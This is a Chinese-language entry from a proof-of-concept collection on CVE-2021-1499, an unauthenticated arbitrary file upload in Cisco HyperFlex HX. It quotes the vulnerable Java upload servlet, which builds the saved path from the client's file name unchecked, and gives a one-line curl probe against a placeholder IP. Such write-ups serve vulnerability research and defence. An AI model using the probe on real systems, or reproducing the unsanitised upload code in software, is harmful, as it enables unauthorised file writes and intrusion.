admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/Cisco HyperFlex HX upload 任意文件上传漏洞 CVE-2021-1499.md
Threekiii e9e1a4597a init
2022-02-20 17:08:56 +08:00

72 lines
2.5 KiB
Markdown
Raw Blame History

# Cisco HyperFlex HX upload 任意文件上传漏洞 CVE-2021-1499
## 漏洞描述
思科在研究人员Nikita Abramov和Mikhail Klyuchnikov发现的HyperFlex HX数据平台中修复了两个Unauth RCE和一个任意文件上载
## 漏洞影响
```
Cisco HyperFlex HX
```
## 漏洞复现
出现漏洞的代码为
```java
public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
this.isMultipart = ServletFileUpload.isMultipartContent(request);
response.setContentType("application/json");
PrintWriter out = response.getWriter();
if (!this.isMultipart) {
out.println("{\"result\": \"Invalid content-type.\"}");
logger.error("{\"result\": \"Invalid content-type. Must be multi-part\"}");
response.setStatus(400);
return;
}
ServletFileUpload upload = new ServletFileUpload();
upload.setSizeMax(this.maxFileSize);
FileOutputStream fout = null;
InputStream stream = null;
try {
FileItemIterator iter = upload.getItemIterator(request);
while (iter.hasNext()) {
try {
FileItemStream fi = iter.next();
stream = fi.openStream();
String uploadedFileName = this.dirPath + "/" + fi.getName();
File uploadedFile = new File(uploadedFileName);
fout = new FileOutputStream(uploadedFile);
byte[] buffer = new byte[1024];
int len;
while ((len = stream.read(buffer, 0, buffer.length)) != -1)
fout.write(buffer, 0, len);
out.println("{\"result\": \"filename: " + uploadedFileName + "\"}");
logger.debug("{\"result\": \"filename: " + uploadedFileName + "\"}");
} catch (org.apache.commons.fileupload.MultipartStream.MalformedStreamException ex) {
logger.info("MalformedStreamException during file upload servlet stream processing: " + ex);
} finally {
if (fout != null) {
logger.info("Closing fout");
fout.close();
}
if (stream != null) {
logger.info("Closing stream");
stream.close();
}
}
}
} catch (Exception ex) {
out.println("{\"result\": \"Upload failed: " + ex.getMessage() + "\"}");
logger.error("{\"result\": \"Upload failed: " + ex.getMessage() + "\"}");
logger.error("Exception during file upload servlet stream processing: " + ex);
response.setStatus(500);
}
```
POC为
```plain
curl -v http://xxx.xxx.xxx.xxx/upload -F x=@/dev/null
```
Reference in New Issue View Git Blame Copy Permalink